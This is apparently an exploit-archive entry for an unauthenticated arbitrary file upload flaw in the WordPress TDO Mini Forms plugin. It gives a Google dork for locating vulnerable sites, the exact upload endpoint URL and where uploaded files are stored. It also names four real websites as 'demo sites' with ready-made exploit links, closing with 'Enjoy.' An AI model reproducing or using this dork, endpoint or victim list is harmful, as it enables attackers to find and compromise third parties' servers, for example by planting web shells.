WordPress TDO Mini Forms third party module suffers from an unauthenticated arbitrary file upload vulnerability. Note that this finding houses site-specific data.
3de9153faa2a4ef534a3bb0f7199602494343fe426db10b531c1835185452ee8
# Exploit Title: Wordpress "TDO Mini Forms" File Upload Vulnerability
# Google Dork: "tdomf-upload-inline.php?tdomf_form_id=1 index"
# Date: 31/9/12
# Exploit Author: HodLuM
# Vendor Homepage: unknown
# Software Link: http://thedeadone.net/download/tdo-mini-forms-wordpress-plugin/
# Version: All
# Tested on: 2.x.x to 3.x.x
# Email: h0dlmx@yahoo.com - hodlum@live.com
~#Exploit:
site.com/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
~#Uploaded files go to:
site.com/wp-content/plugins/tdo-mini-forms/attachments/FILE.*
Demo sites:
http://waqtnews.tv/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
http://funnyfuntoosh.com/blogs/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
http://ideabank.utm.my/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
http://www.mormonmissionprep.com/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
Enjoy.